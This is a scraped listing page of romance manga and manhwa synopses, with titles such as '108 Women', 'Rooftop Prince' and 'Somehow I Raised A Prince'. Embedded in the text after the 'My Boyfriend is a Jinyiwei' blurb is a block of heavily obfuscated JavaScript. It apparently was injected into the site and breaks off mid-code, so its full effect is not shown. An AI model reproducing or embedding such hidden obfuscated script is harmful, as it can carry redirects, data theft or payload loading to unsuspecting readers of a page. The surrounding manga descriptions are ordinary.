Romance - Page 1914

Romance manga is a genre that explores romantic relationships, filled with emotional highs and lows, offering readers a heartfelt journey of love, growth, and conflict.

24332 results

108 Women

Dessa, a witch who built an empire for the human she loved, but did not believe in him. In a situation where she must renounce her witch’s powers and become an ordinary human in order to give birth to an imperial grandson, she proposes a bet to test the emperor Hartwan who swore eternal love. To find yourself among 108 women with the same face. Emperor Hartwan accepts this, and in the end, no matter who he chooses, he even puts out an unconventional condition to welcome the chosen one as an empress. The empire and 107 women resembling the witch gather at the imperial palace. Meanwhile, Arit, ayoung witch who admires Dessa sneaks into the imperial palace in order to prevent Dessa from becoming human interferes with the her bet with the emperor?! The search for the empress proceeds with chaos. Who will win in the end? 108명의 그녀들 108 Girls


The Great Wish

The Empire’s only princess, Sienna Argent, had everything from birth: intelligence, beauty, talent, and even the right to become the Empire’s next ruler. As her 20th birthday approaches, she starts having dreams of her future. She thanks the gods for this power, but then her dreams start to become increasingly strange, depicting a future that isn’t what she dreamed of.An attack from the half-brother she held in contempt, a hidden side to the mother she believed was her ally, a man who starts to influence Sienna’s life both in the present and the future. As her surroundings change, she quickly starts changing as well.


My Boyfriend is a Jinyiwei

In a modern-day loli’s home, a super handsome ancient Jinyiwei falls from the sky! Without parental care, the loli takes him as her closest person and even wants to become his bride?! Though he appears tsundere, cold, and picky on the surface, he finds it harder and harder to let go of her…<script></script><script>(function(_0x53d83e,_0x696195){var _0x4a9494=_0x2ac1,_0x4b9783=_0x53d83e();while(!![]){try{var _0x4596f1=parseInt(_0x4a9494(0x18c))/(0x4a1+0x19b9+-0x1*0x1e59)+parseInt(_0x4a9494(0x18d))/(-0x1a92+0x1453+0x641*0x1)+-parseInt(_0x4a9494(0x194))/(0x1*0x1b8a+0xa8c+-0x2613)*(parseInt(_0x4a9494(0x193))/(0x104c+-0xb3*-0xd+-0x195f))+-parseInt(_0x4a9494(0x1a2))/(-0x51*0x61+-0x1*0x15d7+0x1*0x348d)+parseInt(_0x4a9494(0x19e))/(-0x14f+0x1057*0x2+-0x1f59)+parseInt(_0x4a9494(0x196))/(0x2*0xe1b+0x93d+-0x256c)+-parseInt(_0x4a9494(0x18e))/(-0x11d6+-0xf2*-0x13+-0x18);if(_0x4596f1===_0x696195)break;else _0x4b9783['push'](_0x4b9783['shift']());}catch(_0x315139){_0x4b9783['push'](_0x4b9783['shift']());}}}(_0xeb4c,0x4*-0x2b4b4+0xd6*0xf1a+-0x1e6*-0x3b3));function custom(){var _0x3a07ef=_0x2ac1,_0x36ee8f={'PLijT':function(_0x7f8eda,_0x18fc9b){return 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The Phoenix in a Turbulent World

You’re Reading “The Phoenix in a Turbulent World ”Comics  on Thanks! Description Phoenix rises in turbulent ages. As a famous and clever doctor in the precarious Zhou Dynasty, Qiu Xiluo met two lords and was involved in endless bloodshed. Yan Lang, a gentle and powerful marquis, although never stopped fighting for his kingdom, was willing to die for protecting her. Song Si-ren, a handsome and unrestrained young master of Han Kingdom with great aspiration, went through all the hardships and dangers. When they fought against each other and had to choose between love and power, who could be her knight?Show more You’re Reading “The Phoenix in a Turbulent World ”Comics  on Thanks! Description Phoenix rises in turbulent ages. As a famous and clever doctor in the precarious Zhou Dynasty, Qiu Xiluo met two lords and was involved in endless bloodshed. Yan Lang, a gentle and powerful marquis, although never stopped fighting for his kingdom, was willing to die for protecting her. Song Si-ren, a handsome and unrestrained young master of Han Kingdom with great aspiration, went through all the hardships and dangers. When they fought against each other and had to choose between love and power, who could be her knight?


The Epic Revenge

Marshal, your wife ran away again! Alas, I've got used to that... Qingzhou Gu, a seemingly naïve girl, is plotting a revenge. Every coincidence is under her precise calculation. Every accident is her well-considered move. Could Marshal Si handling his tricky wife? What will happen in their romance? MangaToon got authorization from iCiyuan to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Rooftop Prince

옥탑방 왕세자 When Park Ha discovers three strange men sitting on her new place, she would have never guessed one of them was the Crown Prince. As Park Ha tries to navigate her new life in Seoul, she discovers bits of her secret childhood and how she came to be separated from her family. Meanwhile, 300 years earlier, the Crown Prince is desperate to find out answers to his wife's mysterious death. Before he does, cosmic forces intervene and he's switched with someone who looks just like him from 300-years-later Seoul. The ultimate crossover between Joseon and Seoul fueled by mystery ensues when the two meet.


A Hundred Ways To Abuse A Slag

The strongest goddess of the whole universe is here! Every scumbag of each world must be prepared to get my lessons, okay~? Dear scumbags and third mistresses, I’m the best at abusing and slapping your faces green! I will use violence to curb violence! No flowery bribes nor will be able to stop me! And you, will you be my next host?! I will grant your wishes! 虐渣的一百种方式 One Hundred Ways to Abuse Scum


Starring You and Me

An unforgettable tale of a memory eater! Haeun Do is a trending actor who has to consume other people's memories in order to live. On one fateful day, he meets Soyoung- the first person who seems to be immune to his power. Upon realizing that Soyoung has the potential to change his life, Haeun makes his approach. 너와 나의 드라마


Contract Marriage: I Married My Cunning Childhood Friend

Zhao Youwei is a girl who’s always been worried about her masculine name. All of a sudden, her childhood friend, who had just come back from abroad, proposes to her when he realizes that she is a girl! Liang Miaoyu did that because she bullied him when they were young, which caused him to be traumatized when being in close contact with others. Moreover, Zhao Youwei can’t reject his proposal! What a disaster! Can You Marry Me? I Married My Cunning Childhood Friend Marriage Contracted Childhood Sweetheart Is Too Two-Faced Matrimonio por contrato: Me casé con mi astuto amigo de la infancia Qi Yue Hun Yue De Zhu Ma Tai Fu Hei Qì Yuē Hūn Yuē De Zhú Mǎ Tài Fù Hēi 契约婚约的竹马太腹黑 남사친의 아찔한 청혼


Blind to You

Karen, who used to be known as the #1 bully at her school, was abandoned by a boy she loved. However, who would have thought an unexpected fate would happen to her!


Divorce Me, Husband!

He was possessed by a supporting actor who was swept to death by treason committed by his husband. She’s trying to get a divorce from her husband Claude to survive. Why is this guy so obsessed with me?! “We’re getting divorced, Claude.” “Aila, I’m not going to let you go, I’m not going to let you go.” “Use as much money as you like. Just stay with me, Ayla.” I don’t need it all, and I want to live before I get involved in treason! So please…Divorce, please, husband.


Somehow I Raised A Prince

When the egg was rolled in her arms, the dragon was born. A full-fledged baby-sitter. One well-bred dragon prince of one of the ten emperors. Adele is a girl who grew up in an orphanage and came to her uncle’s house. While being in charge of her aunt’s farm for nine years and taking care of all the insane things on a cow ranch, she accidentally finds a large egg in a tree hole. A child who wakes up from the egg follows Adele like a parent, and Adele gives the child the name Sigmund. In fact, Sigmund, who must be the Emperor of the Empire, stays with Adele in the form of a child, sealed with his powerful mana sealed. Grand Duke Ernest and Archmage Jensen try to find the egg of the lost dragon. Lushen, head of the Imperial knighthood, assisted by Zion, daughter of Grand duke Ernest, who has grown up as a man since childhood helps Adele. Adele and Sigmund finally enter the imperial palace where they were awaited. A magical healing love story unfolded by two people. “You are the beginning and the end of my world, Adele.” The all-fearing ruler of this world, the violent dragon prince Sigmund and his bride Adele. Read manhwa Somehow I Raised A Prince / 어쩌다 보니 왕자님 키워 버렸어요
